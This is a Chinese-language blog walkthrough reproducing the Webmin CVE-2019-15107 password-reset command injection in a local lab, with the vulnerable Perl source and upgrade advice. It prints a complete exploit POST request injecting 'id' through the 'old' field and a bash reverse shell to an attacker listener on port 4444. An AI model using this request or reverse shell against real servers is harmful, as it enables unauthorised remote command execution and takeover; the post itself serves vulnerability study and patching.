Webmin (CVE-2019-15107) 远程命令执行漏洞复现

2023-10-15 03:04

本文主要是介绍Webmin (CVE-2019-15107) 远程命令执行漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • Webmin 远程命令执行漏洞
    • 1. 漏洞编号
    • 2. 漏洞描述
    • 3. 影响版本
    • 4. 利用方法(利用案例)
      • 4.1 启动环境
      • 4.2 漏洞复现
      • 4.3 深度利用
      • 4.4 漏洞原因
    • 5. 附带文件
    • 6. 加固建议
    • 7. 参考信息
    • 8. 漏洞分类

Webmin 远程命令执行漏洞

1. 漏洞编号

CVE-2019-15107

2. 漏洞描述

Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

3. 影响版本

漏洞影响版本为Webmin<=1.920

4. 利用方法(利用案例)

4.1 启动环境

image-20231012170055010

访问靶场地址https://127.0.0.1:10000/

image-20231012170839696

访问https://127.0.0.1:10000/password_change.cgi

image-20231012190358098

4.2 漏洞复现

可以使用bp抓包然后修改数据包的方式

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

还可以使用HackBar,发送POST请求包,并添加攻击Payload

image-20231012190637087

然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。

4.3 深度利用

尝试执行反弹shell命令

先将payload进行URL编码

bash -c "bash -i >& /dev/tcp/192.168.188.185/4444 0>&1"

image-20231012191702397

kali监听4444端口,发送数据包

image-20231012191655140

kali反弹成功

image-20231012191721087

4.4 漏洞原因

出问题的地方就是这个password_change.cgi

  1 #!/usr/bin/perl2 # password_change.cgi3 # Actually update a user's password by directly modifying /etc/shadow4 5 BEGIN { push(@INC, "."); };6 use WebminCore;7 8 $ENV{'MINISERV_INTERNAL'} || die "Can only be called by miniserv.pl";9 &init_config();10 &ReadParse();11 &get_miniserv_config(\%miniserv);12 $miniserv{'passwd_mode'} == 2 || die "Password changing is not enabled!";13 14 # Validate inputs15 $in{'new1'} ne '' || &pass_error($text{'password_enew1'});16 $in{'new1'} eq $in{'new2'} || &pass_error($text{'password_enew2'});17 18 # Is this a Webmin user?19 if (&foreign_check("acl")) {20         &foreign_require("acl", "acl-lib.pl");21         ($wuser) = grep { $_->{'name'} eq $in{'user'} } &acl::list_users();22         if ($wuser->{'pass'} eq 'x') {23                 # A Webmin user, but using Unix authentication24                 $wuser = undef;25                 }26         elsif ($wuser->{'pass'} eq '*LK*' ||27                $wuser->{'pass'} =~ /^\!/) {28                 &pass_error("Webmin users with locked accounts cannot change ".29                             "their passwords!");30                 }31         }32 if (!$in{'pam'} && !$wuser) {33         $miniserv{'passwd_cindex'} ne '' && $miniserv{'passwd_mindex'} ne '' ||34                 die "Missing password file configuration";35         }37 if ($wuser) {38         # Update Webmin user's password39         $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});40         $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);41         $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});42         $perr && &pass_error(&text('password_enewpass', $perr));43         $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});44         $wuser->{'temppass'} = 0;45         &acl::modify_user($wuser->{'name'}, $wuser);46         &reload_miniserv();47         }48 elsif ($gconfig{'passwd_cmd'}) {49         # Use some configured command50         $passwd_cmd = &has_command($gconfig{'passwd_cmd'});51         $passwd_cmd || &pass_error("The password change command <tt>$gconfig{'passwd_cmd'}</tt> was not found");52 53         &foreign_require("proc", "proc-lib.pl");54         &clean_environment();55         $ENV{'REMOTE_USER'} = $in{'user'};      # some programs need this56         $passwd_cmd .= " ".quotemeta($in{'user'});57         ($fh, $fpid) = &proc::pty_process_exec($passwd_cmd, 0, 0);58         &reset_environment();59         while(1) {60                 local $rv = &wait_for($fh,61                            '(new|re-enter).*:',62                            '(old|current|login).*:',63                            'pick a password',64                            'too\s+many\s+failures',65                            'attributes\s+changed\s+on|successfully\s+changed',66                            'pick your passwords');67                 $out .= $wait_for_input;68                 sleep(1);69                 if ($rv == 0) {

5. 附带文件

6. 加固建议

漏洞修复:

  • 升级到1.930版本

  • 在github上下载password_change.cgi文件

7. 参考信息

参考信息

  • Vulhub - Docker-Compose file for vulnerability environment。

  • exploit-db.com/exploits/47230

  • Webmin 0day 远程代码执行 (firosolutions.com)

8. 漏洞分类

远程命令执行漏洞(RCE)

这篇关于Webmin (CVE-2019-15107) 远程命令执行漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/214950

相关文章

Python结合Flask框架构建一个简易的远程控制系统

《Python结合Flask框架构建一个简易的远程控制系统》这篇文章主要为大家详细介绍了如何使用Python与Flask框架构建一个简易的远程控制系统,能够远程执行操作命令(如关机、重启、锁屏等),还... 目录1.概述2.功能使用系统命令执行实时屏幕监控3. BUG修复过程1. Authorization

Linux系统之authconfig命令的使用解读

《Linux系统之authconfig命令的使用解读》authconfig是一个用于配置Linux系统身份验证和账户管理设置的命令行工具,主要用于RedHat系列的Linux发行版,它提供了一系列选项... 目录linux authconfig命令的使用基本语法常用选项示例总结Linux authconfi

grom设置全局日志实现执行并打印sql语句

《grom设置全局日志实现执行并打印sql语句》本文主要介绍了grom设置全局日志实现执行并打印sql语句,包括设置日志级别、实现自定义Logger接口以及如何使用GORM的默认logger,通过这些... 目录gorm中的自定义日志gorm中日志的其他操作日志级别Debug自定义 Loggergorm中的

pycharm远程连接服务器运行pytorch的过程详解

《pycharm远程连接服务器运行pytorch的过程详解》:本文主要介绍在Linux环境下使用Anaconda管理不同版本的Python环境,并通过PyCharm远程连接服务器来运行PyTorc... 目录linux部署pytorch背景介绍Anaconda安装Linux安装pytorch虚拟环境安装cu

linux打包解压命令方式

《linux打包解压命令方式》文章介绍了Linux系统中常用的打包和解压命令,包括tar和zip,使用tar命令可以创建和解压tar格式的归档文件,使用zip命令可以创建和解压zip格式的压缩文件,每... 目录Lijavascriptnux 打包和解压命令打包命令解压命令总结linux 打包和解压命令打

MobaXterm远程登录工具功能与应用小结

《MobaXterm远程登录工具功能与应用小结》MobaXterm是一款功能强大的远程终端软件,主要支持SSH登录,拥有多种远程协议,实现跨平台访问,它包括多会话管理、本地命令行执行、图形化界面集成和... 目录1. 远程终端软件概述1.1 远程终端软件的定义与用途1.2 远程终端软件的关键特性2. 支持的

JavaScript中的reduce方法执行过程、使用场景及进阶用法

《JavaScript中的reduce方法执行过程、使用场景及进阶用法》:本文主要介绍JavaScript中的reduce方法执行过程、使用场景及进阶用法的相关资料,reduce是JavaScri... 目录1. 什么是reduce2. reduce语法2.1 语法2.2 参数说明3. reduce执行过程

在MySQL执行UPDATE语句时遇到的错误1175的解决方案

《在MySQL执行UPDATE语句时遇到的错误1175的解决方案》MySQL安全更新模式(SafeUpdateMode)限制了UPDATE和DELETE操作,要求使用WHERE子句时必须基于主键或索引... mysql 中遇到的 Error Code: 1175 是由于启用了 安全更新模式(Safe Upd

Spring Boot 整合 ShedLock 处理定时任务重复执行的问题小结

《SpringBoot整合ShedLock处理定时任务重复执行的问题小结》ShedLock是解决分布式系统中定时任务重复执行问题的Java库,通过在数据库中加锁,确保只有一个节点在指定时间执行... 目录前言什么是 ShedLock?ShedLock 的工作原理:定时任务重复执行China编程的问题使用 Shed

VScode连接远程Linux服务器环境配置图文教程

《VScode连接远程Linux服务器环境配置图文教程》:本文主要介绍如何安装和配置VSCode,包括安装步骤、环境配置(如汉化包、远程SSH连接)、语言包安装(如C/C++插件)等,文中给出了详... 目录一、安装vscode二、环境配置1.中文汉化包2.安装remote-ssh,用于远程连接2.1安装2